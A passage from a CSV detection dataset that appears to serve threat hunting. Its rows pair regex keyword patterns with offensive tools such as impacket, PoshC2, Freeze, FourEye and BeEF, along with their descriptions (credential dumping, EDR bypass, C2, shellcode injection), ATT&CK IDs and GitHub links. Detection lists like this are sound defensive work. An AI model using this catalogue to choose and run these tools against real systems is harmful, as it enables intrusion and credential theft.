- TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*ForkDump-x64.exe*",".{0,1000}ForkDump\-x64\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x64.pdb*",".{0,1000}ForkDump\-x64\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x86.exe*",".{0,1000}ForkDump\-x86\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x86.pdb*",".{0,1000}ForkDump\-x86\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkPlayground-master*",".{0,1000}ForkPlayground\-master.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*Format SSSD Raw Kerberos Payloads into CCACHE files.*",".{0,1000}Format\sSSSD\sRaw\sKerberos\sPayloads\sinto\sCCACHE\sfiles\..{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*-format=dotnet-createsection -sleep*",".{0,1000}\-format\=dotnet\-createsection\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*--format-string ziiiiizzzb * ",".{0,1000}\-\-format\-string\sziiiiizzzb\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*--format-string ziiiiizzzib *",".{0,1000}\-\-format\-string\sziiiiizzzib\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*fortalice/bofhound*",".{0,1000}fortalice\/bofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*fortra/impacket*",".{0,1000}fortra\/impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*fortra/No-Consolation*",".{0,1000}fortra\/No\-Consolation.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*FortyNorthSecurity*",".{0,1000}FortyNorthSecurity.{0,1000}","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*FortyNorthSecurity/CIMplant*",".{0,1000}FortyNorthSecurity\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*FortyNorthSecurity/FunctionalC2*",".{0,1000}FortyNorthSecurity\/FunctionalC2.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*found-passwords.txt*",".{0,1000}found\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*FourEye(shellcode_bypass*",".{0,1000}FourEye\(shellcode_bypass.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*FourEye-main*",".{0,1000}FourEye\-main.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*fox-it/adconnectdump*",".{0,1000}fox\-it\/adconnectdump.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*fox-it/BloodHound*",".{0,1000}fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*foxlox/hypobrychium*",".{0,1000}foxlox\/hypobrychium.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*fpc -c Seatbelt*",".{0,1000}fpc\s\-c\sSeatbelt.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*FrameManagementAssociationRequest.py*",".{0,1000}FrameManagementAssociationRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementDeauthentication.py*",".{0,1000}FrameManagementDeauthentication\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementProbeRequest.py*",".{0,1000}FrameManagementProbeRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementReassociationResponse.py*",".{0,1000}FrameManagementReassociationResponse\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*framework/obfuscation/*",".{0,1000}framework\/obfuscation\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Framework-MobSF*",".{0,1000}Framework\-MobSF.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*frampton.py*",".{0,1000}frampton\.py.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*freenas_reverse_root_shell_csrf*",".{0,1000}freenas_reverse_root_shell_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Freeze_*_darwin_amd64*",".{0,1000}Freeze_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*Freeze_*_linux_amd64*",".{0,1000}Freeze_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*Freeze-rs -*",".{0,1000}Freeze\-rs\s\-.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs.exe*",".{0,1000}Freeze\-rs\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_darwin_amd64*",".{0,1000}Freeze\-rs_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_linux_amd64*",".{0,1000}Freeze\-rs_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_windows_amd64.exe*",".{0,1000}Freeze\-rs_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*frida -l disableRoot.js -f owasp.mstg.uncrackable1*",".{0,1000}frida\s\-l\sdisableRoot\.js\s\-f\sowasp\.mstg\.uncrackable1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*frida-ps -U*",".{0,1000}frida\-ps\s\-U.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*frida-trace -x ntdll.dll -i * -p *",".{0,1000}frida\-trace\s\-x\sntdll\.dll\s\-i\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Frissi0n/GTFONow*",".{0,1000}Frissi0n\/GTFONow.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*frkngksl/NimExec*",".{0,1000}frkngksl\/NimExec.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*frkngksl/Shoggoth*",".{0,1000}frkngksl\/Shoggoth.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*frkngksl/UnlinkDLL*",".{0,1000}frkngksl\/UnlinkDLL.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*from .core import Fuzzer*",".{0,1000}from\s\.core\simport\sFuzzer.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*from .modules.exploit import Exploit*",".{0,1000}from\s\.modules\.exploit\simport\sExploit.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*from .secretsdump import RemoteOperations*",".{0,1000}from\s\.secretsdump\simport\sRemoteOperations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*from .socks import SocksNegotiator*",".{0,1000}from\s\.socks\simport\sSocksNegotiator.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*from .wfuzz import *",".{0,1000}from\s\.wfuzz\simport\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*from bofhound import *",".{0,1000}from\sbofhound\simport\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*from bofhound.ad import*",".{0,1000}from\sbofhound\.ad\simport.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*from burp import *",".{0,1000}from\sburp\simport\s.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*from burp import*",".{0,1000}from\sburp\simport.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*from DiscordBot import MitmPuppeter*",".{0,1000}from\sDiscordBot\simport\sMitmPuppeter.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*from evilrdp.consolehelper*",".{0,1000}from\sevilrdp\.consolehelper.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - 